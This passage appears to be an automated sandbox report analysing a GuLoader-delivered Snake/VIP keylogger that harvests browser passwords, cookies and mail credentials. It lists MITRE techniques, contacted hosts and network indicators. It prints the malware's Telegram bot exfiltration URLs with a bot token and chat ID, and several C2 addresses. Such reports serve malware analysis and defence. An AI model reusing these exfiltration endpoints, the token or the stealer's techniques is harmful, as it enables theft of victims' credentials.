            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		LSASS Memory116
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection            		1
            Software Packing            		Security Account Manager211
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets41
            Virtualization/Sandbox Evasion            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587907 Sample: fGu8xWoMrg.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 4 other IPs or domains 2->40 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Multi AV Scanner detection for submitted file 2->54 60 6 other signatures 2->60 8 fGu8xWoMrg.exe 1 29 2->8         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 36->56 58 Uses the Telegram API (likely for C&C communication) 38->58 process4 file5 22 C:\Users\user\AppData\...\Afsyringer.Una, Unicode 8->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 62 Suspicious powershell command line found 8->62 12 powershell.exe 28 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\Mangedoblende.exe, PE32 12->26 dropped 28 C:\...\Mangedoblende.exe:Zone.Identifier, ASCII 12->28 dropped 64 Early bird code injection technique detected 12->64 66 Writes to foreign memory regions 12->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 12->68 70 3 other signatures 12->70 16 Mangedoblende.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 checkip.dyndns.com 132.226.247.73, 49937, 80 UTMEMUS United States 16->30 32 api.telegram.org 149.154.167.220, 443, 49997, 49998 TELEGRAMRU United Kingdom 16->32 34 4 other IPs or domains 16->34 42 Multi AV Scanner detection for dropped file 16->42 44 Tries to steal Mail credentials (via file / registry access) 16->44 46 Tries to harvest and steal browser information (history, passwords, etc) 16->46 48 Switches to a custom stack to bypass stack traces 16->48 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            fGu8xWoMrg.exe76%VirustotalBrowse
            fGu8xWoMrg.exe63%ReversingLabsWin32.Ransomware.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Mangedoblende.exe63%ReversingLabsWin32.Ransomware.GuLoader
            C:\Users\user\AppData\Local\Temp\Mangedoblende.exe76%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dll0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.185.174
            		truefalse
              		high
              drive.usercontent.google.com
              		216.58.212.161
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.96.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                            		high
                            https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                              		high
                              http://checkip.dyndns.org/false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabMangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://chrome.google.com/webstore?hl=enlBeqMangedoblende.exe, 00000006.00000002.3346863955.000000001F55C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.orgMangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botMangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20aMangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore6lBeqpowershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://chrome.google.com/webstore?hl=enMangedoblende.exe, 00000006.00000002.3346863955.000000001F561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://varders.kozow.com:8081Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.comMangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.google.com/&)Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/powershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://apis.google.comMangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2494742729.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.office.com/lBeqMangedoblende.exe, 00000006.00000002.3346863955.000000001F58D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.office.com/Mangedoblende.exe, 00000006.00000002.3346863955.000000001F592000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoMangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://translate.google.com/translate_a/element.jsMangedoblende.exe, 00000006.00000003.2566562285.0000000003519000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2566562285.0000000003526000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.2499631816.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive.usercontent.google.com/Mangedoblende.exe, 00000006.00000002.3334889586.000000000351E000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000003.2604018957.0000000003519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://checkip.dyndns.orgMangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.microsoft.powershell.exe, 00000002.00000002.2519984504.000000000852C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorfGu8xWoMrg.exe, Mangedoblende.exe.2.drfalse
                                                                                                        		high
                                                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.ecosia.org/newtab/Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://aborters.duckdns.org:8081Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://ac.ecosia.org/autocomplete?q=Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://51.38.247.67:8081/_send_.php?LMangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anotherarmy.dns.army:8081Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2494742729.0000000004E36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://reallyfreegeoip.org/xml/8.46.123.189$Mangedoblende.exe, 00000006.00000002.3346863955.000000001F417000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://reallyfreegeoip.orgMangedoblende.exe, 00000006.00000002.3346863955.000000001F45C000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F484000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F3ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://drive.google.com/n)D20Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://api.telegram.orgMangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Mangedoblende.exe, 00000006.00000002.3348218353.00000000203C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  149.154.167.220
                                                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                  142.250.185.174
                                                                                                                                  		drive.google.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  104.21.96.1
                                                                                                                                  		reallyfreegeoip.orgUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                  193.122.6.168
                                                                                                                                  		unknownUnited States
                                                                                                                                  		31898ORACLE-BMC-31898USfalse
                                                                                                                                  216.58.212.161
                                                                                                                                  		drive.usercontent.google.comUnited States
                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                  132.226.247.73
                                                                                                                                  		checkip.dyndns.comUnited States
                                                                                                                                  		16989UTMEMUSfalse

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                  Analysis ID:1587907
                                                                                                                                  Start date and time:2025-01-10 19:15:41 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 8m 14s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:fGu8xWoMrg.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:2bbb66a5bad18e8ca2fee4fec0bfc6ce83b1cc4852d712c986685f095b3589ce.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@6/16@6/6
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                  • Number of executed functions: 202
                                                                                                                                  • Number of non-executed functions: 106
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.149.20.212
                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1864 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  13:16:40API Interceptor37x Sleep call for process: powershell.exe modified
                                                                                                                                  13:17:31API Interceptor8084x Sleep call for process: Mangedoblende.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  149.154.167.220RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      104.21.96.1zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • www.aonline.top/fqlg/
                                                                                                                                                      QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • www.mzkd6gp5.top/3u0p/
                                                                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                      • pelisplus.so/administrator/index.php
                                                                                                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • www.mffnow.info/1a34/
                                                                                                                                                      193.122.6.168RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • checkip.dyndns.org/

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      reallyfreegeoip.orgRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.64.1
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.64.1
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      checkip.dyndns.comRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 132.226.247.73
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 132.226.247.73
                                                                                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 132.226.8.169
                                                                                                                                                      api.telegram.orgRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
